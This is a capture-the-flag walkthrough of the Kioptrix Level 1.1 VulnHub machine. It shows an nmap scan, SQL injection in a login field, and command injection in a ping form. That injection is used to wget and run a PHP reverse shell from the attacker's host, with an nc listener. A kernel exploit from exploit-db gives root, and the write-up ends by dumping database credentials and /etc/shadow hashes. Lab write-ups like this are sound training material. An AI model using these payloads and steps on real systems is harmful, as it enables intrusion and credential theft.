Kioptrix: Level 1.1 (#2) CTF VM WalkThrough

VM : Kioptrix: Level 1.1  

Download Link : https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

Nmap Scan :
 # Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4                                                                                                                  [0/1246]
 Nmap scan report for 192.168.1.4
 Host is up (0.00042s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE    VERSION
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 | ssh-hostkey:
 |   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
 |   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
 |_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
 |_sshv1: Server supports SSHv1
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 |_http-server-header: Apache/2.0.52 (CentOS)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 |_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
 | sslv2:
 |   SSLv2 supported
 |   ciphers:
 |     SSL2_RC4_128_EXPORT40_WITH_MD5
 |     SSL2_RC4_128_WITH_MD5
 |     SSL2_DES_64_CBC_WITH_MD5
 |     SSL2_DES_192_EDE3_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
 |_    SSL2_RC4_64_WITH_MD5
 631/tcp  open  ipp        CUPS 1.1
 | http-methods:
 |_  Potentially risky methods: PUT
 |_http-server-header: CUPS/1.1
 |_http-title: 403 Forbidden
 3306/tcp open  mysql      MySQL (unauthorized)
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.9 - 2.6.27
 Network Distance: 2 hops
 
 Host script results:
 |_clock-skew: -3h09m42s
 
 TRACEROUTE (using port 256/tcp)
 HOP RTT     ADDRESS
 1   0.05 ms 172.17.0.1
 2   0.32 ms 192.168.1.4
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 seconds
Open ports are :
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 631/tcp  open  ipp        CUPS 1.1
 3306/tcp open  mysql      MySQL (unauthorized)
port 80 is open. There is a web page


There may be an sql injection vulnerability. I tried to find sql injection with sqlmap, but it did not find anything.
 $ sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"
But after try to find manually with burp repeater, there is a sql injection vulnerability in `psw` field, which can be exploited by putting `' or 1='1 --+` in password field. and it loads another page where we can ping any device within the network.


 192.168.1.10
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2002ms
 rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2
A this functionality, there is possibility for command injection, try to execute command by providing within the ip address
 ip_address;commad
For example
 192.168.1.10;ls
And as expected it returns the filenames on current directory.
 192.168.1.10;ls
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
 index.php
 pingit.php
Another example :
 192.168.1.10;ls -al;pwd;whoami
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
 total 24
 drwxr-xr-x  2 root root 4096 Oct  8  2009 .
 drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
 -rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
 -rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
 /var/www/html
 apache
The user is : apache, dirctory is /var/www/html, all the files are root privileged.

Getting a remote shell :

We are going to use php reverse shell from pentestmonkey.net : http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Download it from there page and change the $ip and $port to your local system.
 set_time_limit (0);
 $VERSION = "1.0";
 $ip = '192.168.1.3';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $shell = 'uname -a; w; id; /bin/sh -i';
 $daemon = 0;
 $debug = 0;
Now to upload this php file we use series of commands. First start a server to host the bd.php(i renamed the reverse shell php file) file. We can use a simple python server
 python -m SimpleHTTPServer 8000
Commands to upload file
 cd /tmp                               # change dirctory to tmp
 wget http://192.168.1.3:8000/bd.php   # downlaod backdoor file
 php -f bd.php                         # execute file
Remember we cant download file on webroot directory, because it is root privileged, and the ping command is executed by user apache. Before execute the commands first start the listener on local machine
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
Command :
 192.168.1.10;cd /tmp/wget http://192.168.1.3:8000/bd.php;php -f bd.php
After the execution we can get a reverse shell on listener
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from 192.168.1.4 45265 received!
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
  12:21:07 up  6:17,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=48(apache) gid=48(apache) groups=48(apache)
 sh: no job control in this shell
 sh-3.00$
 sh-3.00$ whoami
 apache
And we can get the reverse shell.

Kernel Privilege Escalation :

Examining the OS and Kernel version
 sh-3.00# uname -a
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 sh-3.00# cat /etc/*-release
 CentOS release 4.5 (Final)
A google search for kernel 2.6 exploit" give the exploit for kernel 2.6.22 less then is found from here : https://www.exploit-db.com/exploits/9542
 $ wget https://www.exploit-db.com/raw/9542
 $ mv 9542 peroot.c
Now downloading it into the Kioptrix
 sh-3.00$ cd /tmp
 sh-3.00$ wget http://192.168.1.3:8000/peroot.c
 sh-3.00$ gcc peroot.c -o peroot
 dirty.c:109:28: warning: no newline at end of file
 sh-3.00$ ./peroot
 sh-3.00# whoami
 root
It gives the root access.

Examining Files :

By examine php files from webroot directory we find the user 'john' and its password 'hiroshima' on mysql_connect() function.
 sh-3.00# cd /var/www/html
 sh-3.00# ls
 index.php
 pingit.php
 sh-3.00# cat index.php
 <?php
     mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
     //print "Connected to MySQL<br />";
     mysql_select_db("webapp");
 
     if ($_POST['uname'] != ""){
         $username = $_POST['uname'];
         $password = $_POST['psw'];
         $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
         //print $query."<br>";
 ...
 ...
 ...
By using john credentials we can't access the system with ssh, but we can access the mysql database. Now try to execute command in mysql :
 sh-3.00# mysql -u john -phiroshima -e 'show databases;'
 Database
 mysql
 test
 webapp
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
 Tables_in_webapp
 users
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
 id username password
 1   admin   5afac8d85f
 2   john    66lajGGbla
Now at-least we get the login password for users at index.php login page.

We can also look for .mysql_history file for previous typed commands by users.
 show databases;
 create database webapp;
 use webapp;
 create table users(id INT,username varchar(100),password varchar(10));
 show database;
 select * from users;
 show databases;
 use webapp;
 insert into users values(1,'admin','hello');
 select * from users;
 use mysql
 show databases;
 use mysql;
 select * from users where user=john;
 show tables;
 select * from user where user=john;
 select * from user where user='john';
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
 CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
 update user set password = password('hiroshima') where user = 'john';
 use mysql;
 show users;
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 version;
 -v
 ;
 help
 flush privileges;
 show databases;
 use mysql;
 grant select,insert,update,delete on *.* to 'john'@'localhost';
 update user set password = password('hiroshima') where user = 'john';
 flush priveleges;
 use webapp;
 show tables;
 update user set password = password('Ha56!blaKAbl') where user = 'admin';
 update username set password = password('Ha56!blaKAbl') where user = 'admin';
 select * from users;
 update username set password = password('Ha56!blaKAbl') where username = 'admin';
 update users set password = password('Ha56!blaKAbl') where username = 'admin';
 select * from users;
 insert into users values(2,'john','66lajGGbla');
 select * from users;
From /etc/shadow file we got the encrypted passwords for users
 root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
 john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
 harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::